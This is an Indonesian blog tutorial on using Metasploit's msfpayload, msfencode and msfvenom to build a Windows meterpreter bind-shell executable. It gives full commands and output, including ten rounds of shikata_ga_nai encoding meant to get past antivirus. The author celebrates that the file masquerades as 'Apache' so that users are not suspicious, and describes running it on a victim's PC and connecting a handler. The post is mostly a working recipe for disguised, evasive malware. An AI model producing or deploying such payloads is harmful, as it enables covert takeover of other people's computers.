Akhirnya bisa nulis blog lagi.. Beberapa hari yang lalu Metasploit Framework memperkenalkan ‘msfvenom’. Msfvenom adalah fitur baru metasploit yang menggabungkan dua fungsi lama pada Metasploit, yaitu ‘msfpayload’ untuk menggenerate payload dan ‘msfencode’ yang akan meng-encode bytes pada payload sehingga bisa lolos dari signature anti-virus.
Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut:
root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp X > /tmp/clickme.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/bind_tcp Length: 298 Options: {}
Command diatas akan menghasilkan file binary windows executable (exe). Payload file tersebut adalah sebuah meterpreter metasploit yang akan terhubung ke attacker menggunakan bind TCP. Karena LPORT tidak saya definisikan di sana, jadi LPORT default adalah port 4444. Jadilah file ini, kemudian coba di klik… hyahh.. ada warning antivirus
Untuk itulah digunakan msfencode yang akan melakukan encode byte demi byte payload sehingga diharapkan bisa mengecoh signature antivirus
Command untuk meng-encode payload dan keluarannya di /tmp/clickme.exe
root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /tmp/clickme.exe [*] x86/shikata_ga_nai succeeded with size 325 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 352 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 379 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 406 (iteration=4) [*] x86/shikata_ga_nai succeeded with size 433 (iteration=5) [*] x86/shikata_ga_nai succeeded with size 460 (iteration=6) [*] x86/shikata_ga_nai succeeded with size 487 (iteration=7) [*] x86/shikata_ga_nai succeeded with size 514 (iteration=8) [*] x86/shikata_ga_nai succeeded with size 541 (iteration=9) [*] x86/shikata_ga_nai succeeded with size 568 (iteration=10)
Proses encode menggunakan tipe x86/shikata_ga_nai dengan iterasi sebanyak 10 kali encode.
Sedangkan jika menggunakan command msfvenom, cukup satu perintah saja (perhatikan, perintah di atas ‘kan dua perintah yang dipisah ‘pipe’ atau tanda | ) tapi ‘msfvenom’ hanya seperti ini:
./msfvenom -p windows/meterpreter/bind_tcp -f exe -e -i 3 -s 480 RHOST=10.5.253.213 >> /tmp/clickme.exe
Jadilah file kita. Ini penampakan file hasil buatan kita tercinta.
Ini informasi file buatan kita hehe tipuuuu…. Hmm gak habis pikir kenapa namanya harus Apache yah? Sepertinya biar kalau ada warning dari firewall “Program bernama: Apache ingin melakukan koneksi”, user ga ada perasaan curiga…
Oke, sekian tentang penggunaan msfvenom a.k.a msfpayload + msfencode… Tapi tanggung selesaiin blognya biar lebih rame kita coba yuk payload meterpreternya. Tinggal eksekusi saja filenya dari PC victim. Setelah itu jalankan handler di komputer penyerang sbb:
Sesaat setelah masuk, kita bisa mengetikkan perintah-perintah yang asik haha seperti dibawah ini:
Ah itu kan cuma perintahnya dan laporannya.. Ini hasilnya!! hahaha
malem, bisakah saya ikut gabung:)